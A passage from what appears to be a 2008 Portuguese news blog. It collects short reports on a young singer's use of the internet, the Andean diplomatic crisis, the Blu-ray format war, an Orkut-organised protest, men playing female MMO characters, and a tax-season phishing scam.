A relação com a internet vem de cedo. "Para mim, internet é música. Gosto de procurar artistas, uso bastante o Google. E agora também procuro o que as pessoas falam de mim", disse. Para as críticas maldosas, Mallu nem liga. "Gente ruim sempre tem, né? Eu sou saudável, tenho amigos, família. Sou feliz. Pra quê eu vou ligar?"

Sobre as propostas de gravadoras (tem quem diga que seis empresas já entraram em contato), Mallu despista. Mas afirma que vai continuar usando a internet para mostrar sua música. "Eu acho que nunca vou largar a internet, afinal ela sempre foi minha aliada." A paixão pelos encartes de CDs a deixa em dúvida sobre se lançaria seu futuro disco totalmente on-line. "O maior problema é que eu gosto muito de encarte. Sonho em fazer o meu, cheio de desenhos, de coisas bonitas... Até tenho alguns!"

sexta-feira, 7 de março de 2008

Equador, Colômbia e Venezuela selam paz com aperto de mãos

SANTO DOMINGO - Colômbia, Equador e Venezuela encerraram uma disputa nesta sexta-feira, apertando as mãos em uma reunião de cúpula uma semana depois de deslocarem tropas e de vários países cortarem relações com o governo colombiano.

"E com isso... esse incidente que causou tanto dano será resolvido", disse o presidente equatoriano, Rafael Correa, antes de se levantar e cumprimentar o colega colombiano, Alvaro Uribe.

O presidente venezuelano, Hugo Chávez, que culpou os Estados Unidos pela crise e enviou tanques para a fronteira com a Colômbia, aliada norte-americana, também cumprimentou Uribe, aplaudiu com vigor e sorriu com vontade.

A resolução da disputa, que surgiu no sábado quando a Colômbia atacou território do Equador para matar um comandante das Forças Armadas Revolucionárias da Colômbia (Farc), deu um final surpreendente à reunião.

Os cumprimentos foram transmitidos ao vivo pela televisão na América Latina, em resposta a um pedido especial do anfitrião da cúpula, o presidente dominicano, Leonel Fernandez.

Mais cedo Uribe e Correa se enfrentaram na reunião.

Correa chamou o colega colombiano de mentiroso, após ser acusado de ter manter ligações com a guerrilha.

A crise se espalhou pela região, com a Venezuela e a Nicarágua se unindo ao Equador ao cortar relações diplomáticas com Bogotá, enquanto Venezuela e Equador despejavam tropas nas fronteiras com a Colômbia -- o maior aliado dos EUA na região.

A Nicarágua acabou restabelecendo os laços com a Colômbia.

Xbox 360 pode ganhar leitor de discos Blu-ray


Uma matéria veiculada no Financial Times apontou que a Microsoft estaria conversando com a Sony para levar a tecnologia de armazenamento Blu-ray ao console Xbox 360.

Após perder a batalha pela sucessão do DVD, o HD-DVD, mídia anteriormente preferida pela companhia de Bill Gates, poderá ceder seu lugar para o concorrente também no segmento de jogos eletrônicos.

O Financial Times também publicou a declaração de um executivo envolvido com as discussões, que teria falado sobre o drive de Blu-ray ser algo mais que um simples acessório no Xbox 360, ou seja, poderia se tornar a peça fundamental de um novo modelo do console, mais caro, top de linha. Logicamente, se essas informações forem confirmadas, a Microsoft teria de pagar royalties à Sony.

Apesar de a Microsoft não confirmar oficialmente as informações, a Sony Computer Entertainment America (SCEA) comentou que games como Gears of War 3 poderiam ser gravados e lançados em Blu-ray para o aparelho.

O formato Blu-ray é defendido atualmente pelas empresas Sony, Pioneer, Philips, Thomson, LG, Hitachi, Sharp, Samsung e Panasonic (Grupo Matsushita).

Jovens usam Orkut para organizar ato contra Lula neste sábado

SÃO PAULO - Um protesto nacional contra o presidente Luiz Inácio Lula da Silva e a corrupção no País, marcado para este sábado, está sendo organizado via Orkut, site de relacionamentos na internet. O "Dia da Vaia Nacional" está marcado para as 14 horas e deve acontecer em capitais de pelo menos 12 Estados.

A comunidade reúne jovens e conta com 1.838 membros. Na mensagens trocadas no Orkut, os organizadores do movimento rejeitam ligação com partidos e movimentos sociais. Procuram deixar claro ainda que o protesto não tem relação alguma com a campanha "Cansei", que reúne diversas entidades e é liderada pela Ordem dos Advogados do Brasil de São Paulo (OAB-SP).

"É bom lembrar que o nosso movimento não segue nenhuma bandeira, partido ou interesse particular. Essa é uma semente que foi plantada aqui lá pelo dia 18 ou 19 de julho e vem ganhando volume pela Internet", diz a mensagem na página da organização no Orkut.

Um modelo de panfleto com duras críticas a Lula e manchetes de jornal relatando os recentes escândalos também foi definido pelo grupo e será usado nos protestos.

Abaixo as recomendações dos organizadores para quem quiser participar do ato:

- Levar garganta para vaia;

- Qualquer cartolina com frases anti-petralhas, anti-corrupção, anti-irresponsabilidade, anti-totalitarismo, anti-censura, anti-incompetência, anti-obscenidade/escárnio etc;

- Roupas e panos pretos;

- Escrever (você é capaz) e xerocar textos sobre o que se passa de fato no Brasil para distribuição;

- Aviões de isopor;

- Ir em dupla, trio ou grupo (para não se sentirem deslocados nem inseguros);

- Fotos de Lula e Renan Calheiros ou outros;

- Narizes de palhaço;

- Mandar mensagem de celular chamando os amigos;

- Mandar e-mail convidando conhecidos;

- Fazer o que for possível para essa grande vaia acontecer.

Toshiba pára HD-DVD e Blu-ray vence guerra da alta definição


TÓQUIO - A fabricante de eletroeletrônicos Toshiba confirmou, que não irá mais desenvolver, fabricar ou comercializar seu formato de DVD de alta definição, o HD-DVD. A tecnologia competia com o Blu-ray, da Sony. "Concluímos que uma decisão rápida seria melhor", disse o presidente da Toshiba, Atsutoshi Nishida.

Segundo Nishida, a decisão da Warner Bros, anunciada em janeiro, de lançar filmes apenas no formato Blu-ray tornou a desistência inevitável, embora a Toshiba tenha confiança no HD-DVD como tecnologia. "Foi um impacto tremendo", disse. "Se nós continuássemos, isso criaria problemas para consumidores, e nós simplesmente não teríamos nenhuma chance de vencer."

A Warner se junta à Sony Pictures, Walt Disney Co. e Twentieth Century Fox no uso do Blu-ray. Além disso, a rede varejista Wal-Mart anunciou que venderia apenas aparelhos Blu-ray.

Apesar de cancelar a fabricação, a empresa informou que continuará a prestar serviços de manutenção pós-venda a quem já tiver adquirido material com este formato. A Toshiba estima que 1 milhão de pessoas já tenham player e discos de HD-DVD. As vendas terminam em março.

Apesar das estratégias de marketing da Toshiba, que estabeleceu grandes descontos em seus produtos com o objetivo de melhorar sua situação frente ao Blu-ray, a companhia viu suas vendas se reduzirem drasticamente durante os últimos meses.

Em relação à instalação dos reprodutores de HD DVD nos computadores pessoais, a Toshiba explicou que "continua avaliando a situação do mercado", e que tomará uma decisão com base na demanda.

Gamers brasileiros fingem que são mulheres para jogar

“Oi, tudo bom? Quantos anos você tem?”, pergunta um Orc verde e grandalhão a uma bela elfa loira. “Vinte e dois”, ela responde. O papo começa casualmente também no mundo dos games virtuais, só que, aqui, geralmente termina em uma ajuda para terminar uma missão, uma doação de itens raros e um punhado de moedas de ouro.

Quem conhece bem o universo dos Massive Multiplayer Online (MMOs) – jogos em que você cria um personagem e entra em um servidor onde mais 200 mil pessoas estão conectadas – sabe que somente 15% dos jogadores são, realmente, mulheres, segundo dados de uma pesquisa realizada pela Universidade de Stanford, nos EUA. Logo, entende (ou desconfia) que o mais provável é que, por trás daquela bela espécie de elfa, haja um cara barbudo controlando as teclas do PC.

Em um mundo tão masculino há bastante espaço para confusões de gênero e flertes, que com freqüência resultam em enrascadas e situações embaraçosas. Em entrevista ao Link, alguns jogadores brasileiros contam por que decidiram assumir sua parcela feminina.

“Os homens criam personagens femininos por vários motivos. Primeiro porque, se todos criassem avatares masculinos, o mundo (dos games online) seria infestado de meninos e isso seria muito cruel e tedioso”, diz Elton Penella, 25 anos, analista de Administração e Controle, que criou uma menina para homenagear a filha da namorada. Outra razões são agradar os (próprios) olhos, quebrar regras e, embora Penella não tenha dito isso, tirar alguma vantagem.

“Pessoalmente, acho a anatomia feminina bem mais bonita, enche meus olhos”, afirma o designer de games Fábio Florêncio, de 27. O problema é que Florêncio resolveu assumir mais do que apenas um personagem e acabou por viver uma vida dupla por dois anos e meio.

“Sempre perguntavam meu nome, sexo e idade. Em uma dessas situações, decidi fazer algo diferente para ver no que dava e respondi: Juliana/feminino/23. Então combinei com os meus amigos e, sempre que alguém pedia informações sobre minha personagem, eles faziam comentários de como ‘ela’ era legal e, principalmente, bonita fora do jogo”.

A personagem de Fábio se tornou familiar entre os jogadores e rapidamente ficou famosa.“Não demorou muito para que minha caixa de correios ficasse abarrotada de presentes. Quando eu precisava de ajuda para uma missão mais difícil, muitos ‘cavalheiros’ se propunham a ajudar”.

Entre uma mentirinha e outra, Fábio fez grandes amizades e passou por alguns perrengues para conservar sua faceta feminina, como colocar a irmã para falar, quando era necessário o uso de voz, criar um e-mail especial e arrumar fotos falsas. “Se eu falasse a verdade, perderia amigos virtuais e credibilidade”, diz.

Apesar de conhecer os benefícios de ser uma menina no jogo, Fábio afirma que não foi isso que o fez criar um avatar feminino. “Foi algo como ser arrastado pela correnteza, mas os benefícios trazidos acabaram por justificar a farsa”.

Penella concorda que personagens garotas ganham uma atenção extra. “Na maioria das vezes, o pessoal respeita muito e dá uma atenção especial, ajuda nas missões, esclarece dúvidas. E tem aquele tipo que já arrasta a asa para cima”, ri.

Gustavo Iemes, 22 anos, empresário, sentiu o gosto de estar do outro lado da história. Quando jogava Ragnarök Online aos 15 anos foi enganado por um sujeito: “Ele me disse que era uma menina e pediu minha ajuda, tinha até MSN com foto falsa. Nos dávamos muito bem, era até perfeito demais”, conta.

Ele descobriu a maracutaia de modo brusco: um dia tentou acessar sua conta e descobriu que a tal “menina’ havia roubado seu dinheiro virtual, seus itens e tinha apagado todos os seus personagens. “Cheguei até a tentar conversar com ele, mas ele me destratou. Hoje parto do princípio de que todos são homens e trato-os de forma igual. Mas sempre vai ter alguém que vai cair no conto da menina que joga”, conta.

Felipe Monteiro, 22 anos, administrador, revela por que decidiu encarnar uma menina ao participar de jogos online: “No jogo as mulheres possuem a mesma destreza física que os homens, não há diferença entre os sexos, e, mesmo assim, a maioria dos homens liga o avatar feminino ao ser feminino real e, portanto, acha que ele é mais frágil. Sempre gostei de criar personagens meninas para duplicar a raiva do perdedor”.

FALAR A VERDADE
Os três entrevistados que possuem personagens femininos concordam que os games online são ótimos lugares para fazer amigos e criar vínculos, mesmo que travestido no sexo oposto. “Existe o fator social, que se assemelha ao mundo real, pois todos queremos ser reconhecidos e amados”, pondera Fábio.

"No entanto", afirma Elton, “apesar de ter todo o direito de criar um personagem feminino, não faça teatro e nem se aproveite dos outros jogadores porque um dia a casa cai”. Fábio que o diga, pois teve de sair foragido do servidor. Continua jogando como menina, mas garante ter recomeçado “minha rede de contatos da maneira certa: falando a verdade”.

Piratas transformam declaração do IR em armadilha para internautas.


E-mail com falsa notícia tenta fazer usuários clicarem em link com códigos maliciosos. Receita Federal informa que nunca entra em contato com contribuintes via e-mail.
Piratas de computador estão aproveitando o início da entrega das declarações do Imposto de Renda Pessoa Física (IRPF) 2008 nesta segunda-feira (3), para tentar fazer os internautas clicarem em um link e infectarem seus computadores com códigos maliciosos.

O golpe é realizado através de um e-mail com a falsa notícia de que um congestionamento no sistema da Receita Federal teria resultado na perda de algumas declarações. Ao final, a mensagem pede ao usuário que clique em um link para saber se sua declaração pessoal estaria dentro do grupo perdido.

O falso e-mail reproduz o design e os logotipos usados pelo site da Receita Federal.

A instituição informou que nunca envia entra em contato com os contribuintes através de e-mails.

Contaminação

Segundo o laboratório McAfee Avert, quando algum internauta clica no link faz o download dois códigos maliciosos, chamados de PWS-Banker.dldr e de PWS-Banker.gen.aj.

Os programas, que não são capazes de se espalharem sozinhos, facilitam o acesso de piratas de computador ao PC do usuário, permitindo o roubo de informações como dados sobre sua conta bancária.

Esse tipo de ameaça é chamada de phishing scam. Nesse sistema, piratas de computador enviam e-mails sugerindo que os internautas baixem programas, cliquem em links ou visitem sites maliciosos. Quando seguem a sugestão, as vítimas em potencial infectam seus computadores com programas geralmente desenvolvidos para o roubo de informações financeiras.